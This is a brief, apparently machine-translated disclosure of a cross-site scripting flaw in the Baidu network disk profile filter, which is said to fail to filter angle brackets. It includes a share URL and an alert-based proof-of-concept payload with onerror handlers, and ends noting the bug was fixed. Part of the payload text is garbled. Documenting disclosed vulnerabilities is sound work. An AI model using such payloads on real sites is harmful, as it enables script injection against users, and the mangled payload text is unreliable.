Status:
Baidu network disk filter profile double quotes single quotes is not filtered angle brackets.
https://pan.baidu.com/share/home?uk=573720810&suk=G-8t_MosFm72ofBIkhiUQw&view=share#category/type=0
Poc:
</ P> <Video Loop => <Alert Source the onerror = (. 1)> \ \ n \\ n <audio src = x onerror = alert (47)> \\ n \\ n </ audio> </ video>
Follow-up:
Baidu quickly fixes this vulnerability, has been unable to reproduce.